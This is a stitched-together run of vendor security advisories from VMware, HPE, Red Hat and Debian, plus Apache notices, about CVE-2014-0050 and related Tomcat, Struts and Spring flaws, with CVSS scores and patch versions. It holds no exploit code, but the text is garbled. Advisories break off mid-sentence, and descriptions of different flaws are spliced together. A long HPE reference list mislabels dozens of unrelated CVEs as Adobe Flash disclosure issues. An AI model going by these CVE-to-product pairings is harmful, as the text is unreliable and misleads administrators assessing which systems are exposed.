      VMware                 Product    Running  Replace with/
      Product                Version    on       Apply Patch
      =============          =======    =======  =================
      vCenter Server         5.5     any      5.5 Update 2
      vCenter Server         5.1     any      not applicable *
      vCenter Server         5.0     any      not applicable *
      vCenter Update Manager 5.5     any      5.5 Update 2
      vCenter Update Manager 5.1     any      not applicable *
      vCenter Update Manager 5.0     any      not applicable *
    
      * this product uses the Oracle JRE 1.6.0 family *
    
    1. Solution

    Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

    vCenter Server and Update Manager 5.5u2


    Downloads and Documentation: https://www.vmware.com/go/download-vsphere

    ESXi 5.5


    Download: https://www.vmware.com/patchmgr/findPatch.portal

    1. References

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914

    JRE


    Oracle Java SE Critical Patch Update Advisory of April 2014

    http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html


    1. Change log

    2014-09-09 VMSA-2014-0008 Initial security advisory in conjunction with the release of vSphere 5.5 Update 2 on 2014-09-09. Contact

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    security-announce at lists.vmware.com
    bugtraq at securityfocus.com
    fulldisclosure at seclists.org
    

    E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

    VMware Security Advisories http://www.vmware.com/security/advisories

    VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html

    VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html

    Twitter https://twitter.com/VMwareSRC

    Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

    Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c05324755 Version: 1

    HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2016-11-04 Last Updated: 2016-11-04

    Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)

    Source: Hewlett Packard Enterprise, Product Security Response Team

    VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.

    References:

    • CVE-2014-0114 - Apache Struts, execution of arbitrary code
    • CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
    • CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
    • CVE-2015-3253 - Apache Groovy, execution of arbitrary code
    • CVE-2015-5652 - Python, elevation of privilege
    • CVE-2013-6429 - Spring Framework, cross-site request forgery
    • CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
    • PSRT110264

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

    • HP SiteScope Monitors Software Series 11.2xa11.32IP1

    BACKGROUND

    CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2013-6429
      6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
      6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0050
      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0107
      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0114
      6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2015-3253
      7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2015-5652
      8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
      7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
    
    CVE-2016-0763
      6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
      6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
    
    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:
    

    https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

    RESOLUTION

    HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.

    Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.

    HISTORY Version:1 (rev.1) - 4 November 2016 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

    Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

    Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

    Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

    Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

    Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

    3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

    Copyright 2016 Hewlett Packard Enterprise

    Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Fuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant messaging system that is tailored for use in mission critical applications.

    This release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update to Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes various bug fixes, which are listed in the README file included with the patch files.

    The following security issues are also addressed with this release:

    It was found that XStream could deserialize arbitrary user-supplied XML content, representing objects of any type. (CVE-2013-7285)

    It was found that the Apache Camel XSLT component allowed XSL stylesheets to call external Java methods. (CVE-2014-0003)

    It was found that the ParserPool and Decrypter classes in the OpenSAML Java implementation resolved external entities, permitting XML External Entity (XXE) attacks. (CVE-2013-6440)

    It was found that the Apache Camel XSLT component would resolve entities in XML messages when transforming them using an XSLT route. By repeatedly sending a request for an authenticated resource while the victim is completing the login form, an attacker could inject a request that would be executed using the victim's credentials.

    CVE-2013-2071

    A runtime exception in AsyncListener.onComplete() prevents the request from 
    being recycled. This may expose elements of a previous request to a current 
    request.
    

    CVE-2013-4322

    When processing a request submitted using the chunked transfer encoding, 
    Tomcat ignored but did not limit any extensions that were included. by streaming an unlimited amount 
    of data to the server.
    

    For the stable distribution (wheezy), these problems have been fixed in version 7.0.28-4+deb7u1.

    For the testing distribution (jessie), these problems have been fixed in version 7.0.52-1.

    For the unstable distribution (sid), these problems have been fixed in version 7.0.52-1.

    We recommend that you upgrade your tomcat7 packages. This issue was found to be only partially addressed in CVE-2014-0094.

      CVE-2014-0050 may lead to a denial of service condition.
    
      vCenter Operations Management Suite (vCOps) is affected by both 
      CVE-2014-0112 and CVE-2014-0050.
    
      vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not 
      by CVE-2014-0112.
    
      Workaround
    
      A workaround for CVE-2014-0112 is documented in VMware Knowledge Base
      article 2081470. While Tomcat 6 uses Commons FileUpload as part of the Manager
    

    application, access to that functionality is limited to authenticated administrators. This issue was reported responsibly to the Apache Software Foundation via JPCERT but an error in addressing an e-mail led to the unintended early disclosure of this issue[1].

    Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Commons FileUpload 1.3.1 or later once released - - Upgrade to Apache Tomcat 8.0.2 or later once released - - Upgrade to Apache Tomcat 7.0.51 or later once released - - Apply the appropriate patch - Commons FileUpload: http://svn.apache.org/r1565143 - Tomcat 8: http://svn.apache.org/r1565163 - Tomcat 7: http://svn.apache.org/r1565169 - - Limit the size of the Content-Type header to less than 4091 bytes

    Credit: This issue was reported to the Apache Software Foundation via JPCERT.

    Additionally a build problem with maven was discovered, fixed maven packages is also being provided with this advisory.

    References:

    • CVE-2009-5028 - Namazu Remote Denial of Service
    • CVE-2011-4345 - Namazu Cross-site Scripting
    • CVE-2014-0050 - Apache Commons Collection Unauthorized Disclosure of Information
    • CVE-2014-4877 - GNU Wget, Unauthorized Disclosure of Information
    • CVE-2015-5125 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5127 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5129 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5130 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5131 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5132 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5133 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5134 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5539 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5540 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5541 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5544 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5545 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5546 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5547 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5548 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5549 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5550 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5551 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5552 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5553 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5554 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5555 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5556 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5557 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5558 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5559 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5560 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5561 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5562 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5563 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5564 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5565 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5566 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5567 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5568 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5570 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5571 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5572 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5573 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5574 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5575 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5576 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5577 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5578 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5579 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5580 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5581 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5582 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5584 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5587 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5588 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6420 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6676 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6677 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6678 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6679 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6682 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-7547 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8044 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8415 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8416 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8417 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8418 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8419 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8420 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8421 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8422 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8423 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8424 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8425 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8426 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8427 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8428 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8429 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8430 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8431 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8432 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8433 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8434 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8435 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8436 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8437 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8438 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8439 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8440 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8441 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8442 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8443 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8444 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8445 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8446 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8447 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8448 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8449 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8450 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8451 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8452 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8453 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8454 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8455 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8456 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8457 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8459 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8460 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8634 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8635 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8636 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8638 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8639 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8640 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8641 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8642 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8643 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8644 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8645 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8646 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8647 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8648 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8649 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8650 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8651 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0702 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0705 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0777 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0778 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0797 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0799 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-1521 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-1907 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2105 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2106 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2107 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2109 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2183 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2842 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-3739 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4070 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4071 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4072 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4342 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4343 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4393 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4394 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4395 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4396 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4537 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4538 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4539 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4540 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4541 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4542 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4543 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5385 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5387 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5388 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2017-5787 - DoS - LINUX VCRM
    • CVE-2016-8517 - SIM
    • CVE-2016-8516 - SIM
    • CVE-2016-8518 - SIM
    • CVE-2016-8513 - Cross-Site Request Forgery (CSRF) Linux VCRM
    • CVE-2016-8515 - Malicious File Upload - Linux VCRM
    • CVE-2016-8514 - Information Disclosure - Linux VCRM

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Description:

    Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.

    It was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. (CVE-2013-4286)

    It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default. (CVE-2013-4322)

    It was found that previous fixes in Tomcat 6 to path parameter handling introduced a regression that caused Tomcat to not properly disable URL rewriting to track session IDs when the disableURLRewriting option was enabled. A man-in-the-middle attacker could potentially use this flaw to hijack a user's session. Solution:

    Before applying this update, make sure all previously released errata relevant to your system have been applied, and back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):

    1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream 1069905 - CVE-2013-4322 tomcat: incomplete fix for CVE-2012-3544 1069919 - CVE-2014-0033 tomcat: session fixation still possible with disableURLRewriting enabled 1069921 - CVE-2013-4286 tomcat: multiple content-length header poisoning flaws

    1. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

    2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ===================================================================== Red Hat Security Advisory

    Synopsis: Moderate: Red Hat JBoss Fuse 6.1.0 update Advisory ID: RHSA-2014:0400-03 Product: Red Hat JBoss Fuse Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0400.html Issue date: 2014-04-14 CVE Names: CVE-2013-2035 CVE-2013-2172 CVE-2013-2192 CVE-2013-4152 CVE-2013-4517 CVE-2013-6429 CVE-2013-6430 CVE-2014-0050 CVE-2014-0054 CVE-2014-0085 CVE-2014-1904 =====================================================================

    1. Summary:

    Red Hat JBoss Fuse 6.1.0, which fixes multiple security issues, several bugs, and adds various enhancements, is now available from the Red Hat Customer Portal.

    The Red Hat Security Response Team has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

    Red Hat JBoss Fuse 6.1.0 is a minor product release that updates Red Hat JBoss Fuse 6.0.0, and includes several bug fixes and enhancements. Refer to the Release Notes document, available from the link in the References section, for a list of changes.

    1. Description:

    Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform.

    Security fixes:

    A flaw was found in the way Apache Santuario XML Security for Java validated XML signatures. Santuario allowed a signature to specify an arbitrary canonicalization algorithm, which would be applied to the SignedInfo XML fragment. A remote attacker could exploit this to spoof an XML signature via a specially crafted XML signature block. (CVE-2013-2172)

    A flaw was found in the Apache Hadoop RPC protocol. A man-in-the-middle attacker could possibly use this flaw to unilaterally disable bidirectional authentication between a client and a server, forcing a downgrade to simple (unidirectional) authentication. This flaw only affected users who have enabled Hadoop's Kerberos security features. (CVE-2013-2192)

    It was discovered that the Spring OXM wrapper did not expose any property for disabling entity resolution when using the JAXB unmarshaller. A remote attacker could use this flaw to conduct XML External Entity (XXE) attacks on web sites, and read files in the context of the user running the application server. (CVE-2013-4152)

    It was discovered that the Apache Santuario XML Security for Java project allowed Document Type Definitions (DTDs) to be processed when applying Transforms even when secure validation was enabled. A remote attacker could use this flaw to exhaust all available memory on the system, causing a denial of service. (CVE-2013-4517)

    It was found that the Spring MVC SourceHttpMessageConverter enabled entity resolution by default. A remote attacker could use this flaw to conduct XXE attacks on web sites, and read files in the context of the user running the application server. (CVE-2013-6429)

    The Spring JavaScript escape method insufficiently escaped some characters. Applications using this method to escape user-supplied content, which would be rendered in HTML5 documents, could be exposed to cross-site scripting (XSS) flaws. (CVE-2013-6430)

    A denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. (CVE-2014-0050)

    It was found that fixes for the CVE-2013-4152 and CVE-2013-6429 XXE issues in Spring were incomplete. Spring MVC processed user-provided XML and neither disabled XML external entities nor provided an option to disable them, possibly allowing a remote attacker to conduct XXE attacks. (CVE-2014-0054)

    A cross-site scripting (XSS) flaw was found in the Spring Framework when using Spring MVC. When the action was not specified in a Spring form, the action field would be populated with the requested URI, allowing an attacker to inject malicious content into the form. (CVE-2014-1904)

    The HawtJNI Library class wrote native libraries to a predictable file name in /tmp when the native libraries were bundled in a JAR file, and no custom library path was specified. A local attacker could overwrite these native libraries with malicious versions during the window between when HawtJNI writes them and when they are executed. (CVE-2013-2035)

    An information disclosure flaw was found in the way Apache Zookeeper stored the password of an administrative user in the log files. A local user with access to these log files could use the exposed sensitive information to gain administrative access to an application using Apache Zookeeper. (CVE-2014-0085)

    The CVE-2013-6430 issue was discovered by Jon Passki of Coverity SRL and Arun Neelicattu of the Red Hat Security Response Team, the CVE-2013-2035 issue was discovered by Florian Weimer of the Red Hat Product Security Team, and the CVE-2014-0085 issue was discovered by Graeme Colman of Red Hat.

    1. Solution:

    All users of Red Hat JBoss Fuse 6.0.0 as provided from the Red Hat Customer Portal are advised to apply this update.

    The References section of this erratum contains a download link (you must log in to download the update).

    1. Bugs fixed (https://bugzilla.redhat.com/):

    958618 - CVE-2013-2035 HawtJNI: predictable temporary file name leading to local arbitrary code execution 999263 - CVE-2013-2172 Apache Santuario XML Security for Java: XML signature spoofing 1000186 - CVE-2013-4152 Spring Framework: XML External Entity (XXE) injection flaw 1001326 - CVE-2013-2192 hadoop: man-in-the-middle vulnerability 1039783 - CVE-2013-6430 Spring Framework: org.spring.web.util.JavaScriptUtils.javaScriptEscape insufficient escaping of characters 1045257 - CVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature DoS Attack 1053290 - CVE-2013-6429 Spring Framework: XML External Entity (XXE) injection flaw 1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream 1067265 - CVE-2014-0085 Apache Zookeeper: admin user cleartext password appears in logging 1075296 - CVE-2014-1904 Spring Framework: cross-site scripting flaw when using Spring MVC 1075328 - CVE-2014-0054 Spring Framework: incomplete fix for CVE-2013-4152/CVE-2013-6429

    1. References:

    https://www.redhat.com/security/data/cve/CVE-2013-2035.html https://www.redhat.com/security/data/cve/CVE-2013-2172.html https://www.redhat.com/security/data/cve/CVE-2013-2192.html https://www.redhat.com/security/data/cve/CVE-2013-4152.html https://www.redhat.com/security/data/cve/CVE-2013-4517.html https://www.redhat.com/security/data/cve/CVE-2013-6429.html https://www.redhat.com/security/data/cve/CVE-2013-6430.html https://www.redhat.com/security/data/cve/CVE-2014-0050.html https://www.redhat.com/security/data/cve/CVE-2014-0054.html https://www.redhat.com/security/data/cve/CVE-2014-0085.html https://www.redhat.com/security/data/cve/CVE-2014-1904.html https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.fuse&downloadType=distributions&version=6.1.0 https://access.redhat.com/site/documentation/en-US/Red_Hat_JBoss_Fuse/

    1. Contact:

    The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

    Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

    iD8DBQFTS/JWXlSAg2UNWIIRAh+fAJ9677T5eyaDWJuYLiFlhdkjOhZncgCgwPG0 4iA38miFgmWgRtUp0Xztb6E= =/1+z -----END PGP SIGNATURE-----

    -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

    Apache Tomcat 7.x before 7.0.50 allows attackers to obtain Tomcat internals information by leveraging the presence of an untrusted web application with a context.xml, web.xml, .jspx, .tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue (CVE-2013-4590). The verification of md5 checksums and GPG signatures is performed automatically for you. JBoss Web Server provides organizations with a single deployment platform for Java Server Pages (JSP) and Java Servlet technologies, PHP, and CGI. It uses a genuine high performance hybrid technology that incorporates the best of the most recent OS technologies for processing high volume data, while keeping all the reference Java specifications.

    Apache Commons FileUpload package makes it easy to add robust, high-performance, file upload capability to servlets and web applications

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
